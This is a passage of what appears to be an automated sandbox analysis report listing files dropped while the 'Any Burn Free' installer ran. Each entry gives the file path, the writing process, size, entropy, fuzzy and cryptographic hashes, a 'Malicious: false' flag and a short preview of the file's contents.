                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERE920.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.7007468140328563
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYW+kwhSllrIYLOY755HkxYEZ7HtFi87CFXw8VaRaQHd1UOMMk8IS2c:2ZDtw0EUOn2MRaQHn1MMk7S2c
                                                                                                                                                                    MD5:D00FFC8971E9326DAA06193957F445E2
                                                                                                                                                                    SHA1:980DBDD1CB9B703EBAC689465B9B092DE8F7E37E
                                                                                                                                                                    SHA-256:78FC0688CABBC1518B263D527AE72CDC0B7FBE5208FDB5F15333519B734EABA8
                                                                                                                                                                    SHA-512:CC36C01C8FCC0F796A863372FD09A019CF978E66665242F11C60E16616DBC87EF9F4E844C1493377B5B2FAB68A447CBB1243C98C421C9A2FED9192DD1944BA36
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERECA5.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):91504
                                                                                                                                                                    Entropy (8bit):3.0539399379955836
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:S/jcIhodfQpRKbTPz9Ytjvk0n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+H+m+kUL:S/jcIhodfQpRKbTPz9Ytjc0n+sI+E+oa
                                                                                                                                                                    MD5:1C0BDA7726CDB2256F8A9F46A688005C
                                                                                                                                                                    SHA1:FD2B66491028F317A57900D0E8BD7BC803084534
                                                                                                                                                                    SHA-256:FFA9855C3FFDB33F9F2BCA1039A92BBA4559663DDA1CCEAE90D80F4B38B80185
                                                                                                                                                                    SHA-512:D5244A92156340707411ED2F3E05DE544370CBAB4CA202FDF7146A6F3DC3E42D6EE6E26AEADCB5454A9D9BD5027CDECE83CB4380D576E85A7FBA65F70255F453
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERED62.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.6958015357654
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYWCd3aODKY+YdWiHqYEZZ9tFi17VFywhNpPnizaeHEM3kKIu+2d:2ZD2K5X6p/oaeHEM3k9X2d
                                                                                                                                                                    MD5:732DD22C836540592D17B7F16924F5FD
                                                                                                                                                                    SHA1:97939BC16BBA6B79D408265F67003050C2928A1A
                                                                                                                                                                    SHA-256:A0EC2DF6939C24108669C0592EC1DCB789BC065F80994DDFE84E536FB64B9EB2
                                                                                                                                                                    SHA-512:E4B885A311532BF54B8315B41586F2E7A4A20B10A0B5AB81C36B0A8509D333E6908580172FD0A8823A2DDE6004F4A7877E69622F820DF727FE383F30BC81F7BD
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERF27.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):89730
                                                                                                                                                                    Entropy (8bit):3.058241484853377
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:KOWVXc/+udmiMpAQY4DwHq6yPgMY20n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+P:KOWVXc/+udmiMpAQY4DwHq6yPgZ20n+h
                                                                                                                                                                    MD5:B16A092FE45377193D969CDC6C6102FA
                                                                                                                                                                    SHA1:8A646B99B7EC848FE755A41811B074BBA06AC4B8
                                                                                                                                                                    SHA-256:1C11796F4E210E6554AE2E9A6DB9A0CCDEA0E2E85E6680410BA2AE909AB29BFF
                                                                                                                                                                    SHA-512:F50AFBDEB2555B620509B484165260D6D89F120282D32D616223B03CD46558C1BAACF356B230B6353A1893AAD6326EF3CF3A2FB6E6ACCA4085617232A9D10AB3
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERF2F1.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):91524
                                                                                                                                                                    Entropy (8bit):3.054161526960372
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:6oDX/Ihodf/pRzbjPz96HhvO0n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+H+m+kL:6oDX/Ihodf/pRzbjPz96HhW0n+sI+E+W
                                                                                                                                                                    MD5:A3F1F9464F6D9BD556AACFDACA67BC4C
                                                                                                                                                                    SHA1:E50ED614BE5AE5BC09F7FC337FAD95B2A1B8D8E4
                                                                                                                                                                    SHA-256:7A1742AC9ABFDB62463481EC9864FA1C8DEE5A065F07269B3B7187C2AF6601F7
                                                                                                                                                                    SHA-512:7582616F0999291012384AC3747CE4C4E966A4F1BAF175E02CAC8DAC661871041663AA4DD1823EC527D45FCB4D8D8DFA42631B8995FC7CC29359F6784CFDC68E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERF449.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.6977640774791785
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYWIhIVDSeYUYoEWcHqYEZTUtFiS7pKFbwBqzraIH+2MJakp3Ic2w:2ZDv7Dbc03aIHvMJakWc2w
                                                                                                                                                                    MD5:6F77722120A69F40B3DBAB2FCD89795B
                                                                                                                                                                    SHA1:A90A5F2392859B3863BFC6AC99B6B761A1C58177
                                                                                                                                                                    SHA-256:332148E1E5E5F11408C2CAD778F1DD4C09076ED8A780B3AE3BD925AE3FB82B0F
                                                                                                                                                                    SHA-512:37C1A91601C2DC647F9210BE68610571C56CE4489895C4FD5DB44BBA6107C0E514819B477E2B3C37C12EB3E4BADE7B9675A8E1B911AE89F3272C8A84AFB22852
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERFAD2.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):93044
                                                                                                                                                                    Entropy (8bit):3.052011105002831
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:/sbcIhodf/pRzbePz9i6QvS0n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+H+m+kU7:/sbcIhodf/pRzbePz9i6Qa0n+sI+E+oy
                                                                                                                                                                    MD5:B092A08280993DFDFF0C2AF2F4889AB2
                                                                                                                                                                    SHA1:9A0A5C1CCF79EA3F23E02C7760149FE9E6674FA5
                                                                                                                                                                    SHA-256:1DE46C2F05D950E1410F15058A40DE3EE2BFCC73FE8571D3A66FBFE1C24F229F
                                                                                                                                                                    SHA-512:B56634BF4FCDCA30E4F90D72576E055644CCB7AAE79044BDED28AE04B826A97E5BAAC79B32E3DA2FC47C45CDD55FFFC9F6606DD9926E7DE0914CD05FF1434A03
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERFFD5.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.6975025353172524
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYW9kbB14x9YBYX0WeHqYEZjktFiN7XFvwhqjqaZHG+MtkNIT2z:2ZDvm2fWaZHxMtkST2z
                                                                                                                                                                    MD5:14CE0E9E1087E8F7177121429A5A285C
                                                                                                                                                                    SHA1:0693D94A9F6522A33C8877C823346F445C7588B8
                                                                                                                                                                    SHA-256:A2C76D781C707054D81E0D63BC710C09E14B0CA607A64A41AED50641560F9B01
                                                                                                                                                                    SHA-512:D425AD493BC41676EB0307FBDA46A05836A9F88330C0C6359AC3474F8DE13E15C05D420F8B7E9EB16369104456B11D15436CCC2FBF37A03B02FB00EC41EE89A0
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\rc65.dat

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4
                                                                                                                                                                    Entropy (8bit):0.8112781244591328
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Zln:b
                                                                                                                                                                    MD5:612F309087565745CA61C53FCAF6FA7D
                                                                                                                                                                    SHA1:71507967E6A56DDF1D77BA7CA77A2B9D548DFBBC
                                                                                                                                                                    SHA-256:7D77CD3C850B580EB161CC980642C3D9A70344FF6E127935AA11C79218F2A968
                                                                                                                                                                    SHA-512:CCC9058DFF95ADFA7EE8DEFE27F40863B4EF2D3358BCA4FB700A7321D74605DD5788E9E7EE2C895D88E9449751CA76C28FD16EC2A2BFF23664BAAB61DA89ECAE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:....

                                                                                                                                                                    C:\ProgramData\resource-a.dat

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):128
                                                                                                                                                                    Entropy (8bit):2.9545817380615236
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:SmwW3Fde9UUDrjStGs/:Smze7DPStGM
                                                                                                                                                                    MD5:98DDA7FC0B3E548B68DE836D333D1539
                                                                                                                                                                    SHA1:D0CB784FA2BBD3BDE2BA4400211C3B613638F1C6
                                                                                                                                                                    SHA-256:870555CDCBA1F066D893554731AE99A21AE776D41BCB680CBD6510CB9F420E3D
                                                                                                                                                                    SHA-512:E79BD8C2E0426DBEBA8AC2350DA66DC0413F79860611A05210905506FEF8B80A60BB7E76546B0CE9C6E6BC9DDD4BC66FF4C438548F26187EAAF6278F769B3AC1
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:30ea4c433b26b5bea4193c311bc4a25098960f3df7dbf2a6175bf7d152ea71ca................................................................

                                                                                                                                                                    C:\ProgramData\resource-b.dat

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):128
                                                                                                                                                                    Entropy (8bit):1.2701231977328944
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:WAmJuXDz8/:HHzc
                                                                                                                                                                    MD5:0D6174E4525CFDED5DD1C9440B9DC1E7
                                                                                                                                                                    SHA1:173EF30A035CE666278904625EADCFAE09233A47
                                                                                                                                                                    SHA-256:458677CDF0E1A4E87D32AB67D6A5EEA9E67CB3545D79A21A0624E6BB5E1087E7
                                                                                                                                                                    SHA-512:86DA96385985A1BA3D67A8676A041CA563838F474DF33D82B6ECD90C101703B30747121A6B7281E025A3C11CE28ACCEDFC94DB4E8D38E391199458056C2CD27A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:ccddf9e705966c2f471db9..........................................................................................................

                                                                                                                                                                    C:\ProgramData\ts65.dat

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):8
                                                                                                                                                                    Entropy (8bit):2.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:ot:ot
                                                                                                                                                                    MD5:F1A8C88308A462CD253B3FCB10A3DD49
                                                                                                                                                                    SHA1:5B4FC2E3F974349A9E3076CE40DE42BBE57044A4
                                                                                                                                                                    SHA-256:1479D0A179C540B57A373D0AC79E058D823DECC8B0CA1351F4820CAA304EA1A8
                                                                                                                                                                    SHA-512:F0B0EEB5B38FBCD2FFB39BAEE21118D65AB1584AB0F5156E7D7E6DCAEEE60CC5CACB34C7BA7AEAD71D3B962FA7E64B9FACA9D2974A697028985EC4C7A9F3F562
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:...e....

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\SDL2.dll (copy)

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
